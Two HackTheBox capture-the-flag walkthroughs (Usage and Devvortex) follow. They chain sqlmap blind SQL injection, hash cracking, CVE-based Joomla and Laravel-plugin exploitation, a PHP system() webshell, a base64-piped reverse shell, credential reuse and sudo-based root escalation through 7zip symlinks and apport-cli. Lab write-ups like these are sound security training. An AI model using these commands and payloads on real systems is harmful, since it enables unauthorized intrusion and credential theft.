0x2501

Intro

Usage is a retired easy rated box on hackthebox. It features blind SQL injection, the exploitation of a vulnerable laravel plugin, hash cracking and wildcard spares.

Walkthrough

I started with a portscan.

22/tcp open ssh
80/tcp open http

The webserver redirects to usage.htb which I add to /etc/hosts. I then started a subdomain enumeration using ffuf.

ffuf -u 'http://usage.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.usage.htb" --fw 6

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://usage.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.usage.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 6
________________________________________________

admin                   [Status: 200, Size: 3304, Words: 493, Lines: 89, Duration: 52ms]
:: Progress: [4989/4989] :: Job [1/1] :: 909 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

I get a hit on admin and add admin.usage.htb to /etc/hosts.

Having done some automatic enumeration, I start having a look at the base domain. I tested the account creation form for some basic sql injection, mainly just inputting single quotes – nothing there. I then created an account and tested the /forgot-password endpoint for some basic injection techniques. Inputting a ' returns a 500 – Internal Server Error which made be believe to have found a blind SQL injection.

I intercepted the request with Burp Suite, saved it to a file and then ran sqlmap using that request.

sqlmap -r forgot_pass.req

This gained me the following information: – Backend: MySQL > 5.0.12 – Blind Injectable – 8 Columns

Which is not that much but a start, especially considering that I just ran a tool. It's also a really good idea to RTFM, which leads to the following chain of commands (This takes a while to run!).

I first enumerated the used database, which gets me usage_blog.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -current-db

I then enumerated all tables, which gets me admin_users as an interesting table.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -D usage_blog --tables

I then dump the table admin_users.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -D usage_blog -T admin_users --dump

This gained me the following entry $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2,admin

Taking a look at the hashcat example hashes page or using a script like hashid shows, that it's a bcrypt hash.

hashcat -m 3200 admin_db_hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

This gains admin:whatever1 which I used to login into the web application.

The only thing that looked kind of interesting was the ability to upload a profile picture. I did some research on the displayed packages which lead me to CVE-2023-24249.

I used Burp Suite to proxy my requests and just followed the PoC. I had to activate the Option Follow Redirects in the Repeater Tab. Using the uploaded webshell can be a bit tricky because theres a cleanup script running which deletes the shell.

I am now logged in as dash, which gains me the user flag. The file .monitrc kind of sticks out. Having a look at the file I gain another set of credentials: admin:3nc0d3d_pa$$w0rd. I then looked for other users on that box.

cat /etc/passwd | grep -e "$sh"

Another user is xander. I tried using the pillaged password to login as xander, which worked.

Executing sudo -l shows that xander is allowd to run exactly one binary as root. One function of this binary is backing up the website. It uses 7zip to do so, which I can exploit.

  1. Create the file @root.txt in /var/www/html
  2. Create a symlink ln -s -r /root/root.txt root.txt in /var/www/html
  3. Execute the application. It will now output the root flag.

Intro

Devvortex is a retired, easy rated box on hackthebox. It features exploitation of a content management system, hash cracking and exploiting an application to escalate privileges on a linux machine.

Walktrough

Enumeration

Let's start with an nmap scan.

22 open ssh
80 open http

Accessing the webserver at port 80 redirects us to devvortex.htb, so let's add this one to /etc/hosts/. The site doesn't look too interesting. Maybe there are other sites hosted here.

Using ffuf to enumerate other sites:

ffuf -u http://devvortex.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H 'Host: FUZZ.devvortex.htb' --fw 4

We get a hit on dev.devvortex.htb, so let's add that to our hosts file.

Before starting any sort of manual enumeration, let's fuzz for some interesting endpoints:

ffuf -u http://dev.devvortex.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt --fs 162

We get a hit on /administrator. Navigating to that endpoint shows that Joomla is used as a CMS. A way to enumerate the Joomlas version is accessing the joomla.xml file, which is usually atadministrator/manifests/files/joomla.xml Acessing this file, shows that Joomla version 4.2.6 is running.

Conducting a quick search, we find out that this version is vulnerable to CVE-2023-23752 for which public exploits exist.

Exploiting a vulnerable Joomla version

Let's have a quick look at the exploit:

[...]
def fetch_users(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
  http.get(vuln_url)
end
[...]
def fetch_config(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
  http.get(vuln_url)
end
[...]

Seems like we just have to access these endpoints.

curl -s http://dev.devvortex.htb/api/index.php/v1/users?public=true | jq
[...]
  "data": [
    {
      "type": "users",
      "id": "649",
      "attributes": {
        "id": 649,
        "name": "lewis",
        "username": "lewis",
        "email": "lewis@devvortex.htb",
        "block": 0,
        "sendEmail": 1,
        "registerDate": "2023-09-25 16:44:24",
        "lastvisitDate": "2023-10-29 16:18:50",
        "lastResetTime": null,
        "resetCount": 0,
        "group_count": 1,
        "group_names": "Super Users"
      }
    },
[...]

curl -s http://dev.devvortex.htb/api/index.php/v1/config/application?public=true | jq
[...]
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "user": "lewis",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "password": "P4ntherg0t1n5r3c0n##",
        "id": 224
      }
[...]

I only included the interesting bits. Using the leaked credentials we are able to login.

Gaining RCE on the box

As an admin we can add code to various templates. I decided to add a webshell to error.php and then use it to gain a reverse shell.

Webshell:

<?php echo Text::_(system($_GET['cmd'])); ?>

Accessing the webshell: http://dev.devvortex.htb/media/templates/site/cassiopeia/js/main.js?cmd=$COMMAND

Reverse Shell

echo "$base64_encoded_reverse_shell" | base64 -d | bash

Host Enumeration

We can already assume that some sort of database is running, but let's confirm this by running netstat -tulnp. This shows that a database service is listening on it's default port. We can connect to it by using lewis' credentials. Then just dump the user table.

Dumping Credentials and cracking hashes

mysql> select * from sd4fg_users;

lewis:$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
logan:$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

Let's check if a user named logan exists on this box, grep logan /etc/passwd. Logan is a user on this machine.

I decided to use john to crack Logans hash.

john --format=bcrypt hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

tequieromucho    (?)    

1g 0:00:00:05 DONE (2024-04-13 16:24) 0.1992g/s 279.6p/s 279.6c/s 279.6C/s lacoste..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

This gains us logan:tequieromucho.

User Enumeration

Running sudo -l shows that logan is allowed to run apport-cli using sudo. A quick search on howto abuse this, shows that we might be able to abuse CVE-2023-1326 to gain root privileges.

I just wanted to be sure that apport doesn't crash or something so I first generated a valid crash report.

sudo /usr/bin/apport-cli -f --pid 17932 --save /var/crash/ex.crash && 
sudo /usr/bin/apport-cli -c /var/crash/ex.crash
!/bin/bash

We are now root.